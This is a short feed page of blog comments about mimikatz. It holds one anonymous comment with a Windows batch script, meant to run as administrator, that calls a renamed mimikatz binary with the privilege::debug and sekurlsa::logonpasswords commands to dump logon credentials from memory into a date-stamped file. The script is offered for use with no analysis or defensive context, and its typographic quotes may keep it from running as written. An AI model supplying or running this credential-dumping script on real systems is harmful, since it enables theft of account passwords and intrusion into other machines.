Quantcast
Channel: Commentaires sur : mimikatz
Viewing all articles
Browse latest Browse all 501

Par : xXx

$
0
0

save this file as anyname.bat and run as administrator with CMD.
@echo off
For /f « tokens=2-4 delims=/  » %%a in (‘date /t’) do (set mydate=%%c-%%a-%%b)
For /f « tokens=1-2 delims=/: » %%a in (‘time /t’) do (set mytime=%%a%%b)
mm.exe privilege::debug sekurlsa::logonpasswords exit > %mydate%_%mytime%


Viewing all articles
Browse latest Browse all 501